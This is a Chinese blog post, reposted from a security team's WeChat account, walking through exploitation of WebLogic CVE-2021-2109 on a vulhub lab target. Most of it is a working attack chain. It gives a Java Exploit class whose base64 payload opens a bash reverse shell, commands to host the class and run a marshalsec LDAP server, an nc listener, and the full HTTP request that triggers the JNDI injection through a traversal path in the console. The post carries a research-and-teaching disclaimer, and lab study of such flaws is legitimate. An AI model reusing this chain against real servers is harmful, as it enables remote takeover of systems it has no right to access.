weblogic-CVE-2021-2109漏洞分析

admin
admin
admin
138296
文章
113
评论
2021年4月24日02:56:05评论89 views字数 2013阅读6分42秒阅读模式


        在vulhub里找一个weblogic靶场进行搭建,本次实验使用的是14883靶场


启动后访问:

http://192.168.124.165:7001/console


weblogic-CVE-2021-2109漏洞分析


然后访问一下漏洞点:

http://192.168.124.165:7001/console/css/%252e%252e%252f/consolejndi.portal



weblogic-CVE-2021-2109漏洞分析

漏洞利用


1、首先编译一个恶意java文件,需要进行base64编码


import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader; public class Exploit{  public Exploit() throws Exception {      //Process p =Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});    Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMjgvNjY2NiAwPiYx|base64-d |bash"});      InputStream is = p.getInputStream();      BufferedReader reader = new BufferedReader(new InputStreamReader(is));       String line;      while((line = reader.readLine()) != null) {          System.out.println(line);      }       p.waitFor();      is.close();      reader.close();      p.destroy();    }   public static void main(String[] args) throws Exception {    }}


把java程序进行编译,命令为:

Javac Exploit.java

会生成一个Exploit.class文件,讲这个文件放入web服务器中,确保让ladp能够调用到

这里使用python开启:

python -m SimpleHTTPServer 8000

访问一下看看是否正常工作


weblogic-CVE-2021-2109漏洞分析


2、使用marshalsec启动一个ladp服务器。

下载地址:https://github.com/mbechler/marshalsec

下载后切换到marshalsec目录下使用maven进行打包。

mvn clean package -DskipTests

 

weblogic-CVE-2021-2109漏洞分析

 

然后启动ldap服务:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer http://192.168.124.133:8000/#Exploit 9000


weblogic-CVE-2021-2109漏洞分析


3、开启nc监听:

nc -lvvp 6666


weblogic-CVE-2021-2109漏洞分析


4、发送exp成功反弹shell

Exp(注意ip的192.168.124;133是为分号):

 

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.124;133:9000/a12345;AdminServer%22) HTTP/1.1Host: 192.168.124.165:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:ADMINCONSOLESESSION=KC0jqfXzn_Dy5s6jg9QVT79hzzFgEptBFkxDUQE_SJYogGpGLfPn!-1632926475Connection: close


weblogic-CVE-2021-2109漏洞分析


weblogic-CVE-2021-2109漏洞分析


本文始发于微信公众号(Khan安全团队):weblogic-CVE-2021-2109漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月24日02:56:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   weblogic-CVE-2021-2109漏洞分析https://cn-sec.com/archives/250103.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息